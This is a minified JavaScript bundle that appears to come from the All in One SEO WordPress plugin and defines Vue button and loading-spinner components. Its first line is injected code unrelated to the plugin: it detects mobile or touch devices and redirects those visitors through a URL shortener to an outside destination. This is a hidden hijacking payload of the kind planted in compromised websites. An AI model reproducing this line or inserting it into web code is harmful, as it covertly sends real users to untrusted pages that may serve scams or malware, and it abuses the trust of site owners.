(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as y}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as a,i as c,j as s,P as g,Q as r,R as b,B as u,v as m,M as d,U as f,S as B}from"./vendor-vue-ui.232c7c36.js";import{_ as k}from"./vendor-other.39e59221.js";const p={props:{dark:Boolean}};function v(e,l,i,t,n,o){return a(),c("div",{class:g(["aioseo-loading-spinner",{dark:i.dark}])},[...l[0]||(l[0]=[s("div",{class:"double-bounce1"},null,-1),s("div",{class:"double-bounce2"},null,-1)])],2)}const w=y(p,[["render",v]]),S={key:0,class:"new-badge"},z={__name:"Button",props:{color:String,tag:{type:String,default:"button",description:"Button html tag"},block:Boolean,loading:Boolean,wide:Boolean,disabled:Boolean,type:{type:String,default:"default",description:"Button type (blue|black|green|red|gray|wp-blue)"},nativeType:{type:String,default:"button",description:"Button native type (e.g button, input etc)"},size:{type:String,default:"",description:"Button size (small-table|small|medium|large)"},link:{type:Boolean,description:"Whether button is a link (no borders or background)"},to:{type:[Object,String],description:"The router link object or string"},newBadge:{type:Boolean,description:"Whether to show the new badge"}},setup(e){const i={newBadge:k("NEW!","all-in-one-seo-pack")};return(t,n)=>(a(),r(B(e.tag),{type:e.tag==="button"?e.nativeType:"",disabled:e.disabled||e.loading,to:e.tag==="router-link"?e.to:"",onMouseenter:n[0]||(n[0]=o=>t.$emit("mouseenter",o)),onMouseleave:n[1]||(n[1]=o=>t.$emit("mouseleave",o)),class:g(["aioseo-button",[{[e.type]:e.type},{[e.size]:e.size},{"btn-link":e.link},{disabled:e.disabled&&e.tag!=="button"},{color:e.color},{loading:e.loading}]])},{default:b(()=>[u(t.$slots,"loading",{},()=>[e.loading?(a(),r(m(w),{key:0,dark:e.type==="gray"},null,8,["dark"])):d("",!0)]),u(t.$slots,"default"),e.newBadge&&!e.loading?(a(),c("span",S,f(i.newBadge),1)):d("",!0)]),_:3},40,["type","disabled","to","class"]))}};export{w as C,z as _};
